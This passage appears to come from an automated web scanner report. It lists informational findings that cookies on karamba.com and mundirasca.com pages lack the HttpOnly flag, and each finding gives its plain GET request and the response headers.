GET /InviteFriend.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:11 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:11 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:11 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:11 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:11 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 57669


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.257. http://www.karamba.com/PlayersClub.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.karamba.com
Path:   /PlayersClub.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PlayersClub.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:13 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:13 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:13 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:13 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:13 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 54138


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.258. http://www.karamba.com/Privacy.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.karamba.com
Path:   /Privacy.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Privacy.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:22 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:22 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:22 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:22 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:22 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 56157


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.259. http://www.karamba.com/Promotions.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.karamba.com
Path:   /Promotions.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Promotions.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:12 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:12 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:12 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:12 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:12 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48406


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.260. http://www.karamba.com/Responsible.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.karamba.com
Path:   /Responsible.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Responsible.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:31 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:31 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:31 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:31 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:31 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 51857


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.261. http://www.karamba.com/Sitemap.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.karamba.com
Path:   /Sitemap.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Sitemap.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:48 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:48 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:48 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:48 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:48 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71246


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.262. http://www.karamba.com/Terms.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.karamba.com
Path:   /Terms.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Terms.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:23 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:23 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:23 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:23 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:23 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 108541


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.263. http://www.karamba.com/UnderAge.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.karamba.com
Path:   /UnderAge.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /UnderAge.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:50 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:50 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:50 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:50 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:50 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44945


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.264. http://www.karamba.com/click/Karamba.com/ENG/Home/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.karamba.com
Path:   /click/Karamba.com/ENG/Home/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click/Karamba.com/ENG/Home/ HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:39:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:39:02 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:39:02 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:39:02 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:39:02 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:39:02 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44696


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.265. http://www.mundirasca.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:40 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:40 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:40 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:40 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:40 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37105


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.266. http://www.mundirasca.com/AboutUs.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /AboutUs.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AboutUs.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:41 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:41 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:41 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:41 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:41 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37870


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.267. http://www.mundirasca.com/ContactUsChat.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /ContactUsChat.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsChat.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:50 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:50 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:50 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:50 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:50 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36409


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.268. http://www.mundirasca.com/ContactUsFax.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /ContactUsFax.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsFax.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:51 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:51 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:51 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:51 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:51 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36318


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.269. http://www.mundirasca.com/ContactUsMail.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /ContactUsMail.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:50 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:50 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:50 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:50 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:50 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44029


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

